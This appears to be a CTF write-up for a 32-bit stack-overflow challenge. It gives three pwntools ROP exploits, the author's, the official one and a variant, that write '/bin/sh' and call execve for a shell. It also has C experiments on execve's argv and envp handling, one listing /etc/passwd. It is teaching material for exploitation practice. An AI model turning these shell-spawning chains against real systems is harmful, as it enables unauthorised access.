nep 2022 cat
2022-07-29 01:22:00 【SquirreI7】
Took a look at this one while slacking off.
First set up the arguments for execve, then jump to the execve gadget.
Reuse the `add esp, 0x20 ; ret` gadget in place of the usual three-register `pop ; pop ; pop ; ret`.
As long as you notice the stack-lifting operation at the beginning of the function, everything works out...
```python
from pwn import *      # import and helper aliases below are assumed; the original script omitted them
p = process('./main')
se = p.send            # send raw bytes
ri = p.recv            # receive whatever the program printed
ir = p.interactive     # hand the shell over to the user

ret = 0x08048127                 # ret gadget
sys_write = 0x08048110           # write() stub in the binary
sys_read = 0x080480F0            # read() stub in the binary
aGoodLuck = 0x0804B000           # "Good luck" string in the data section
addr = 0x0804B000 + 0x500        # binsh's addr: where "/bin/sh" gets written
r_w = 0x08048130
add_esp_20__ret = 0x08048190     # add esp, 0x20 ; ret  (replaces the usual pop*3 ; ret)
start = 0x080481A0               # program entry, returned to for another read
execve = 0x08048115              # execve() stub in the binary

def exp(i):
    # round 1: read(0, addr, 7), then return to start; "/bin/sh" lands at addr
    pl = 0x10 * b'a' + p32(sys_read) + p32(start)
    pl += p32(0) + p32(addr) + p32(len("/bin/sh"))
    pl += p32(addr) + p32(0) + p32(0)   # addr stores "/bin/sh"; these slots later serve as execve args
    # gdb.attach(p)
    se(pl)
    ri()
    se(b"/bin/sh")
    # round 2: return to start once more, with the execve stub queued after five zero slots
    pl = 0x10 * b'a' + p32(start)
    pl += p32(0) * 5 + p32(execve)
    # gdb.attach(p)
    ri()
    se(pl)
    # round 3: write(1, aGoodLuck, 11), cleaning up the three args with add esp, 0x20 ; ret
    pl = 0x10 * b'a' + p32(sys_write) + p32(add_esp_20__ret)
    pl += p32(1) + p32(aGoodLuck) + p32(11)
    ri()
    se(pl)

if __name__ == "__main__":
    exp(1)
    ir()
```

Official writeup
```python
from pwn import *
p = process('./main')
sys_read = 0x080480f0             # read() stub in the binary
sys_execve = 0x08048115           # execve() stub in the binary
binsh = 0x0804B000 + 0x200        # anywhere in data section

# read(0, binsh, ...) returns into sys_execve; the fd slot (0) doubles as execve's
# return address, so the call becomes execve(binsh, binsh + 7, 0). binsh + 7 points
# at the zero bytes after "/bin/sh", i.e. an argv whose only element is NULL.
payload = b"b" * 0x10 + p32(sys_read) + p32(sys_execve) + p32(0) + p32(binsh)
payload += p32(binsh + 7) + p32(0) * 3 + b"\x00\x00"  # 50 byte overflow
payload += b"/bin/sh\x00" + b"\x00" * 3               # 11 byte, read into binsh by sys_read
# gdb.attach(p)
p.send(payload)
p.interactive()
```
Only after reading the official writeup did I realise it can be played this way.
Send all the data at once: it sits in the input buffer anyway, so there is no need to send twice.
The most important point is execve.
Usually you have to construct execve('/bin/sh', NULL, NULL),
but here it is execve('/bin/sh', ptr, NULL) with *ptr = NULL.
Experiment shows that execve of /bin/sh does not necessarily need two NULLs.
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* execve() */

int
main(int argc, char **argv){
    printf("Hello \n");
    /* argv with one junk member; the NULL terminator is added so the array is well-formed */
    char *ptr[] = { "squ", NULL };
    execve("/bin/sh", (char * const *)ptr, NULL);   /* envp is NULL, argv[0] is never used */
    return 0;
}
```
But if argv has two non-NULL members, there will be problems:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* execve() */

int
main(int argc, char **argv){
    printf("Hello \n");
    char * const *ptr = NULL;
    char *p[] = {
        "squ",
        // "irrel",   with this entry present you do not get a shell; comment it out and you do
        NULL
    };
    ptr = p;
    execve("/bin/sh", ptr, ptr);   /* the same array serves as both argv and envp */
    return 0;
}
```
For example:
```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* execve() */

int
main(){
    printf("Hello \n");
    char * const argv[] = {
        "Yoiko",        /* argv[0]: deliberately not the program name */
        "-al",
        "/etc/passwd",
        NULL,
    };
    char *envp[] = {    /* declared for illustration; not passed below */
        "squ",
        "irrel",
        NULL
    };
    execve("/bin/ls", argv, NULL);
    return 0;
}
```
Normally argv[0] should be the name of the program being executed (by convention only).
Here it is deliberately replaced with an irrelevant word, because it is never used:

```c
char * const argv[] = {
    "Yoiko",
    "-al",
    "/etc/passwd",
    NULL,
};
```

So for execve("/bin/sh", argv, envp), in the extreme case the array argv points to can have one member; that member is not used, so it doesn't matter.
But not two, because the second member would be taken as something to execute, and sh here runs with no parameters.
In this challenge, though, it is hard to find a second-level pointer (a pointer to a NULL pointer).
So it is enough to make argv and envp both point at a NULL; you don't need to set both of them to NULL themselves. Solving the problem this way is much more convenient.
(Someone experienced told me before that execve's argv and envp both need to be NULL, and I believed it. Sure enough, practice is the source of true knowledge.)
```python
from pwn import *
p = process('./main')
sys_read = 0x080480f0             # read() stub in the binary
sys_execve = 0x08048115           # execve() stub in the binary
binsh = 0x0804B000 + 0x200        # anywhere in data section
gGoodLuck = 0x0804B000            # "Good luck" string; unused in this variant

# same layout as the official payload, but both argv and envp point at binsh + 7,
# the NULL pointer formed by the zero bytes after "/bin/sh"
payload = b"b" * 0x10 + p32(sys_read) + p32(sys_execve) + p32(0) + p32(binsh)
payload += p32(binsh + 7) + p32(binsh + 7) + p32(0) * 2 + b"\x00\x00"  # 50 byte overflow
payload += b"/bin/sh\x00" + b"\x00" * 3                               # 11 byte
# gdb.attach(p)
p.send(payload)
p.interactive()
```
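To check the argv/envp rule discussed above without touching the challenge binary, here is an added C harness (not the author's code) that forks, calls execve() with the same argument shapes as the experiments, and returns the child's exit status. It assumes /bin/sh exists and that no file named "irrel" is in the working directory.

```c
#include <fcntl.h>
#include <unistd.h>
#include <sys/wait.h>

/* Fork, execve() `path` with the given argv/envp in the child and return its
 * exit status (-1 if fork/wait fails, the child dies by a signal, or execve
 * fails). The child's stdin is /dev/null, so an argument-less sh exits on EOF. */
static int run_with(const char *path, char *const argv[], char *const envp[])
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        int fd = open("/dev/null", O_RDONLY);
        if (fd < 0 || dup2(fd, STDIN_FILENO) < 0)
            _exit(125);
        execve(path, argv, envp);
        _exit(126);                 /* only reached if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    int code = WEXITSTATUS(status);
    return (code == 125 || code == 126) ? -1 : code;
}

/* The official payload's shape: argv and envp both point at a single NULL
 * pointer, so sh receives no arguments and exits 0 when stdin hits EOF. */
int status_null_member(void)
{
    char *ptr[] = { NULL };
    return run_with("/bin/sh", ptr, ptr);
}

/* The author's first experiment: one junk member, then NULL, reused as both
 * argv and envp. sh never looks at argv[0], and an environment string with no
 * '=' is simply ignored, so this still yields a working shell (exit 0). */
int status_one_member(void)
{
    char *ptr[] = { "squ", NULL };
    return run_with("/bin/sh", ptr, ptr);
}

/* Two members: sh takes argv[1] ("irrel") as the script to run. No such file
 * exists, so execve succeeds but the shell exits with an error instead. */
int status_two_members(void)
{
    char *ptr[] = { "squ", "irrel", NULL };
    return run_with("/bin/sh", ptr, ptr);
}
```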